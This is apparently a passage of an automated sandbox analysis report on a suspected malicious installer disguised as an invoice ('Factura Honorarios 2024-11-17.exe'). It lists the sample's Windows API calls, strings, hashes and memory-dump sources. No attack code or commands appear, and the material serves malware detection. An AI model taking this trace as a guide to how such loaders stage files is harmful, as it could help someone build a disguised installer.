                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                  • String ID: 1C@$Call$N
                                                                                                                                  • API String ID: 3103080414-3974410273
                                                                                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                  • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                                                  • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 589700163-1721811535
                                                                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                  • MulDiv.KERNEL32(000AB431,00000064,000AB435), ref: 00402E3C
                                                                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6FF4121B: GlobalAlloc.KERNEL32(00000040,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF4265B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF42690
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: 4938daf1278d790891e81f961bee6d6d801dce33f878162fe332b3114ef93a38
                                                                                                                                  • Instruction ID: 0e4dc2ca5478a03c421b6f30823301b7b53c85657c7f8207a725e905dc1edcff
                                                                                                                                  • Opcode Fuzzy Hash: 4938daf1278d790891e81f961bee6d6d801dce33f878162fe332b3114ef93a38
                                                                                                                                  • Instruction Fuzzy Hash: 0D310032114601EFCB119F68C998D2ABFB6FF9B318B10063DF541C3362C732A8699B15
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s$6B
                                                                                                                                  • API String ID: 3540041739-3884863406
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp$C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll
                                                                                                                                  • API String ID: 3109718747-1825216331
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGlobal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2979337801-0
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF424DA
                                                                                                                                    • Part of subcall function 6FF4122C: lstrcpynW.KERNEL32(00000000,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF4123C
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 6FF42460
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF4247B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4216380887-0
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FF421F0,?,00000808), ref: 6FF41639
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FF421F0,?,00000808), ref: 6FF41640
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FF421F0,?,00000808), ref: 6FF41654
